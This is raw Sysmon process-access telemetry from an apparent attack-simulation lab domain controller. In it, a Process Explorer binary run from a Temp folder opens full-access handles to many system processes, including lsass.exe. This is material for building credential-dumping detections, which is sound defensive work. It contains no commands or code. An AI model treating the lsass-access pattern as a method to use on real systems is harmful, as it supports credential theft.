15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785954Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785953Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785952Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785951Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785950Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785949Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785948Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785947Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785946Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785945Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785944Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786065Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786064Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786063Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786062Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786061Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786060Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786059Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786058Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786057Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786056Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786055Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786054Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786053Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786052Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786051Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786050Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786049Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786048Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786047Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786046Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786045Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786044Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786043Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786042Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786041Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786040Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 